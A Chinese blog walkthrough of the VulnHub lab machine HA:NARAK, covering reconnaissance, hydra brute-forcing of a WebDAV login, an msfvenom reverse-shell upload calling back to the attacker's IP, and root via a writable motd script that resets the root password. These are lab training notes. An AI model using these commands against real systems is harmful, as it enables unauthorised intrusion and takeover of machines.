VulnHub渗透测试实战靶场-HA:NARAK

最新推荐文章于 2024-05-28 16:45:00 发布
最新推荐文章于 2024-05-28 16:45:00 发布
阅读量824 收藏 1
点赞数
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119821997
版权

VulnHub渗透测试实战靶场-HA:NARAK

环境下载

HA:NARAK靶机搭建

  • 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.140
  • 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.246.140sudo nmap -sU -Pn 192.168.246.140,发现开放了 22、68、69、80 四个端口
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.140

漏洞挖掘

  • 访问 192.168.246.140/webdav 发现需要用户名和密码进行登录,使用 cewl 生成 worldlist 后利用 hydra 进行爆破,得到一组用户名和密码:yamdoot:Swarg
cewl http://192.168.246.140 -w wordlist.txt

hydra -L wordlist.txt -P wordlist.txt -f -V 192.168.246.140 http-get /webdav

getshell

  • 搜索 webdav 相关漏洞利用方式后发现可以 cadaver 执行 put 命令来上传一个 shell
  • 使用 msfvenom 生成反弹 shell 的木马或者直接利用 Kali 自带的 webshell,将木马上传上去,访问该木马即可接收到反弹 shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.246.129 LPORT=1234 R > shell.php

提权

  • 翻阅信息,在 /mnt 下发现一个文件 hell.sh,查看该文件发现一串 Brainfuck 编码,解码后得到 chitragupt
  • 尝试利用 chitragupt 作为密码,利用 Home 目录下的用户进行登录
  • 用 python 起一个 http 服务,将 linpeas.sh 上传到目标靶机,并给 linpeas.sh 加上权限
  • 运行 linpeas.sh,发现 /etc/update-motd.d/ 目录下部分文件可写入
  • 修改 etc/update-motd.d/00-header 文件,将 root 的密码修改掉
echo "echo 'root:d1no' | sudo chpasswd" >> 00-header
  • 重新登录 ssh,使写入的内容执行,成功拿到 root 权限
H3rmesk1t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机练习 narak ,个人学习心得
09-08
在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP 地址 在渗透测试中,第一步就是探测靶机的 IP 地址。我们可以使用 fping 命令来探测 IP 地址,例如:`fping -aqg 192.168.71.0...
Goruntu-Isleme
02-21
Bu komşuların sınıfları sayısının toplamı alınarak, en sık görülen sınıf o noktanın sınıflandırması olarak seçilir. **Jupyter Notebook Kullanımı** Jupyter Notebook, bilimsel ...
narak靶场实战详解
Askshhbs的博客
04-22 1954
网络安全,web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 靶机:https://download.vulnhub.com/ha/narak.ova 注释:使用vmwarworkstation运行虚拟机 难度:中+ 目标:取得root权限+2Flag 网络配置:这里简单介绍下我的网络配置,靶机和Kali都用的VMware,然后使用nat连接,开启了dhcp。 0x00 环境配置 虚拟网络编辑器: Kali: 靶机:
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 9059
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulhub漏洞靶场搭建
最新发布
weixin_51725318的博客
05-28 1749
Vulhub漏洞靶场搭建
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2496
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
vulhub靶场搭建
阿大撒大撒的博客
08-22 1849
vulhub靶场搭建使用教程,五分钟入门。
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7417
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Google搜索引擎算法的秘密
05-18
在IT行业中,搜索引擎优化(SEO)是至关重要的领域,尤其是对于Google搜索引擎,它的算法秘密一直是业界探讨的焦点。Google作为全球最广泛使用的搜索引擎,其强大的搜索能力得益于不断更新和优化的算法。...
VulnHub靶场渗透实战-hackable3
随心所欲不逾矩
11-11 852
靶场环境:Virtualbox(最后总结出来:用新版本导入)网络模式:桥接。靶场难度:中等。结果思路总结:本节使用的工具和漏洞难度中等,涉及到CTF中的隐写术,Brainfuck解密。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1311
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机。
靶场实战Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 1066
Vulnhub - JANGOW: 1.0.1 靶标实战
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2098
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3436
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 1555
vulnhub的dc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(五)DerpNStink:1【从外部网站到穿透内网提权!! !】
hyjcking的博客
11-28 879
这台靶机我用了将近两天的时间才拿下,真的是比较有难度的一台中级靶机,里面涉及到了许多渗透测试的知识和技巧,值得花时间好好研究一番。可以发现建站用的是wordpress,hh这就很舒服了,一般在打靶的时候发现wordpress建站说明就是突破口,我们可以用wpscan扫一下。得到密码为wedgie57,再登录一下刚才登的网站,用户名是Unclestinky,只找到了之前在数据库发现的flag2,没有其他信息了。之前nmap扫出来过22端口,尝试ssh登录,发现没法用密码登录,需要指纹密钥。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(四)venom1 这台靶机步骤让你充分了解反弹shell的原理及用法
hyjcking的博客
11-26 1425
这台靶机结合了很多渗透测试的知识,可以让你充分了解反弹shell的原理及用法
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2171
Vulnhub DC-1、DC-2靶机通关手册
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1116
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值